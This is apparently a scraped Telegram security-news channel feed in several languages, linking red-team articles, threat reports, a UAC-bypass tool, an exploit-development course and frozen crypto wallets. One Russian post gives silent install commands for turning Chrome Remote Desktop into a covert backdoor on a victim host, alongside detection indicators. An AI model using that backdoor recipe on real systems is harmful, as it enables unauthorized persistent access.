Forwarded from Sec Note
Red Team Tactics: Writing Windows Kernel Drivers for Advanced Persistence (Part 1)
Red Team Tactics: Writing Windows Kernel Drivers for Advanced Persistence (Part 2)
Red Team Tactics: Writing Windows Kernel Drivers for Advanced Persistence (Part 2)
This post, as indicated by the noscript, will cover the topic of writing Windows kernel drivers for advanced persistence. Because the subject matter is relatively complex, I have decided to divide the project into a three or a four part series. This being the first post in the series, it will cover the fundamental information you need to know to get started with kernel development. This includes setting up a development environment, configuring remote kernel debugging and writing your first “Hello World” driver.
❤4
K4YT3X's Channel
Binja 啥时候加了 pseudo rust,真意外
This media is not supported in your browser
VIEW IN TELEGRAM
😁9❤1
UAC-0001 cyberattacks on the security and defense sector using the LAMEHUG software tool using the LLM (Large Language Model) (CERT-UA#16039)
https://cert.gov.ua/article/6284730
#LAMEHUG , #apt28
https://cert.gov.ua/article/6284730
#LAMEHUG , #apt28
Closing the Execution Gap.pdf
2.2 MB
Hardware-Backed Telemetry for Detecting Out-Of-Context Execution
https://www.preludesecurity.com/runtime-memory-protection
https://www.preludesecurity.com/runtime-memory-protection
❤5🗿3
Forwarded from Sec Note
UACMe
#uac_bypass
Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor. This project demonstrates various UAC bypass techniques and serves as an educational resource for understanding Windows security mechanisms.
#uac_bypass
🔥7
Pay2Key: A New Player in the RaaS Market with an Eye on Russia
Threat Intelligence F6 analysts have studied the Pay2Key ransomware service, which has been distributed on Russian-language cybercriminal forums using the RaaS model since late February 2025.
❤2
Im_in_your_logs.pdf
29.1 MB
Black Hat USA 2025:
"I'm in Your Logs Now, Deceiving Your Analysts and Blinding Your EDR".
A comprehensive ETW event generation tool
❤4
Offensive Security & Red Teaming Labs and Projects
Bitnet-labs
Bitnet-labs
Personal Red Team and Offensive Security labs, exercises, and projects.
This repository documents my journey to become an Offensive Security professional and Red Teamer
🤔1
Forwarded from Coinicap
❄️ بلوکه شدن بیش از 28 میلیون دلار دیگر
🔸بنیاد تتر در 26 جولای، بیش از 28 میلیون دلار دارایی تتر را فریز و والتهای مربوطه را در لیست سیاه خود قرار می داده است.
🔸بررسی ما مشخص کرد که این والتها با احتمال بسیار بالا برای یک سکوی ایرانی بوده اما نمیتوان با قطعیت گفت کدام سکو و پلتفرم ایرانی این دارایی ها را از دست داده است. حجم واریزیها از صرافی نوبیتکس به این والتها، احتمال اینکه این والتها برای صرافی نوبیتکس باشد را بسیار پایین آورده و تقریبا رد می کند.
🥶 در مجموع بیش ار 50 میلیون دلار دارایی بلوکه شده توسط بنیاد تتر مرتبط با پروژه های ایرانی شناسایی شده است. برخی از این والتها نیز با صرافیهای متمرکز خارجی مانند بایننس در ارتباط بودهاند که احتمالا آنها نیز در صرافی بلوکه و یا در والتهای ناشناس، فلگ یا فریز شدهاند.
برخی آدرس والت های فریز شده:
TBJT9BP7cM5yYne9kTdf2HNu9mX1WpRQpt
TGuqbYqJ4m1J8dKWB3NVnsuXtgXCQkgdyf
TTc6TVtmRUpYR9fhZeixsNkJuCMRzFqfcb
🔸بنیاد تتر در 26 جولای، بیش از 28 میلیون دلار دارایی تتر را فریز و والتهای مربوطه را در لیست سیاه خود قرار می داده است.
🔸بررسی ما مشخص کرد که این والتها با احتمال بسیار بالا برای یک سکوی ایرانی بوده اما نمیتوان با قطعیت گفت کدام سکو و پلتفرم ایرانی این دارایی ها را از دست داده است. حجم واریزیها از صرافی نوبیتکس به این والتها، احتمال اینکه این والتها برای صرافی نوبیتکس باشد را بسیار پایین آورده و تقریبا رد می کند.
🥶 در مجموع بیش ار 50 میلیون دلار دارایی بلوکه شده توسط بنیاد تتر مرتبط با پروژه های ایرانی شناسایی شده است. برخی از این والتها نیز با صرافیهای متمرکز خارجی مانند بایننس در ارتباط بودهاند که احتمالا آنها نیز در صرافی بلوکه و یا در والتهای ناشناس، فلگ یا فریز شدهاند.
برخی آدرس والت های فریز شده:
TBJT9BP7cM5yYne9kTdf2HNu9mX1WpRQpt
TGuqbYqJ4m1J8dKWB3NVnsuXtgXCQkgdyf
TTc6TVtmRUpYR9fhZeixsNkJuCMRzFqfcb
👍2🔥2😁1
XWorm V6: Advanced Evasion and AMSI Bypass Capabilities Revealed
Why do these malware samples exhibit such a basic design? 🫥
❤3😁2
Forwarded from Threat Hunting Father 🦔
Chrome Remote Desktop (CRD) — легитимный инструмент от Google, позволяющий управлять системой через веб-интерфейс. Но при грамотной установке и конфигурации он превращается в удобный бекдор: скрытный, устойчивый, шифрованный и легитимный.
Переход на remotedesktop.google.com → загрузка .msi через Set up via SSH.
📦 Установка на жертве
msiexec /i chromeremotedesktophost.msi /qn
Требуются локальные админ-права.
В браузере запускается мастер CRD.
После авторизации система выдаёт команду настройки подключения с OAuth-кодом.
🛠️ Обход GUI через undocumented флаг
Чтобы избежать необходимости ручного ввода PIN через GUI:
remoting_start_host.exe --code="TOKEN" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=%COMPUTERNAME% --pin=123456
Ключ --pin= не задокументирован, но работает (≥ 6 цифр).
После запуска команды хост появится в веб-интерфейсе CRD.
Подключение через браузер: ввод PIN → полный GUI-доступ.
Импакт
🔹 Устойчивый доступ (если настроен unattended mode)
🔹 Полноценный GUI
🔹 трафик — уходит в Google
🔹 Низкая видимость: всё работает внутри chrome.exe, без .exe из сторонних RAT'ов
🔹 Отсутствие необходимости в порт-форвардинге / firewall-обходе
🛡️ Detection / Hunting
- Установка Chrome Remote Desktop Host:
%ProgramFiles(x86)%\Google\Chrome Remote Desktop\
- Службы: remoting_host.exe
- Планировщик задач: chromeremotedesktophost
- Нетипичный трафик к:
remotedesktop-pa.googleapis.com
relay.mtls.sandbox.googleapis.com
- Поведенческий анализ chrome.exe с GUI-доступом в off-hours
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4👍1😁1
A Mega Malware Analysis Tutorial Featuring Donut-Generated Shellcode
We created an in-depth malware analysis tutorial featuring shellcode generated by a tool named Donut. The tutorial walks through a single infection chain from end to end, starting with a sample, and assuming no prior knowledge of the malware in question.
We created an in-depth malware analysis tutorial featuring shellcode generated by a tool named Donut. The tutorial walks through a single infection chain from end to end, starting with a sample, and assuming no prior knowledge of the malware in question.
❤4
Forwarded from OS Internals (Abolfazl Kazemi)
Media is too big
VIEW IN TELEGRAM
🎥 ویدئوی معرفی دوره Exploit Development در لینوکس
📚 توی این دوره قراره یاد بگیریم آسیبپذیریها در لینوکس چطور به وجود میان، چطور شناسایی میشن و چطور میشه ازشون استفاده کرد. قدمبهقدم جلو میریم: از آشنایی با ساختار و امنیت لینوکس، تا پیدا کردن باگها و نوشتن اکسپلویت برای اونها.
🧨 بخش مهم دوره، مهندسی معکوس برنامههای لینوکسیه؛ یعنی یاد میگیریم چطور یک فایل اجرایی رو باز کنیم، کدهاشو بخونیم و ضعفهاشو پیدا کنیم. با ابزارهایی مثل GDB، pwndbg، Ghidra، Radare2، PwnTools و چند تا ابزار دیگه کار میکنیم و در عمل میبینیم چطور میشه مکانیزمهای امنیتی مثل ASLR، Stack Canaries، NX رو دور زد.
💣 در طول دوره با انواع آسیبپذیریها مثل Buffer Overflow، Integer Overflow، Format String و چیزهای دیگه آشنا میشیم، روشهای بهرهبرداری رو یاد میگیریم و روی چالشهای CTF تمرین میکنیم.
💡در پایان هم یک پروژه عملی داریم: تحلیل یک CVE واقعی و نوشتن اکسپلویت برای اون.
⏰ هر پنجشنبه منتظر یک فصل از دوره باشید. شروع از ۵شنبه ۳۰ مرداد.
https://news.1rj.ru/str/OxAA55/140
📚 توی این دوره قراره یاد بگیریم آسیبپذیریها در لینوکس چطور به وجود میان، چطور شناسایی میشن و چطور میشه ازشون استفاده کرد. قدمبهقدم جلو میریم: از آشنایی با ساختار و امنیت لینوکس، تا پیدا کردن باگها و نوشتن اکسپلویت برای اونها.
🧨 بخش مهم دوره، مهندسی معکوس برنامههای لینوکسیه؛ یعنی یاد میگیریم چطور یک فایل اجرایی رو باز کنیم، کدهاشو بخونیم و ضعفهاشو پیدا کنیم. با ابزارهایی مثل GDB، pwndbg، Ghidra، Radare2، PwnTools و چند تا ابزار دیگه کار میکنیم و در عمل میبینیم چطور میشه مکانیزمهای امنیتی مثل ASLR، Stack Canaries، NX رو دور زد.
💣 در طول دوره با انواع آسیبپذیریها مثل Buffer Overflow، Integer Overflow، Format String و چیزهای دیگه آشنا میشیم، روشهای بهرهبرداری رو یاد میگیریم و روی چالشهای CTF تمرین میکنیم.
💡در پایان هم یک پروژه عملی داریم: تحلیل یک CVE واقعی و نوشتن اکسپلویت برای اون.
⏰ هر پنجشنبه منتظر یک فصل از دوره باشید. شروع از ۵شنبه ۳۰ مرداد.
https://news.1rj.ru/str/OxAA55/140
❤5👎1
https://x.com/CyberRaiju/status/1956566419388182954
#CVE_2025_30023 , #CVE_2025_30024 , #CVE_2025_30025 , #CVE_2025_30026
#CVE_2025_30023 , #CVE_2025_30024 , #CVE_2025_30025 , #CVE_2025_30026
X (formerly Twitter)
Jai Minton (@CyberRaiju) on X
As of Thurs Aug 14th we're seeing clear indications that a threat actor has now weaponised and is exploiting vulnerabilities in Axis camera software (CVE-2025-30023/4/5/6) which was presented at DEFCON. Props to @Cyber4a53 for find.
https://t.co/ktPlOJkekW…
https://t.co/ktPlOJkekW…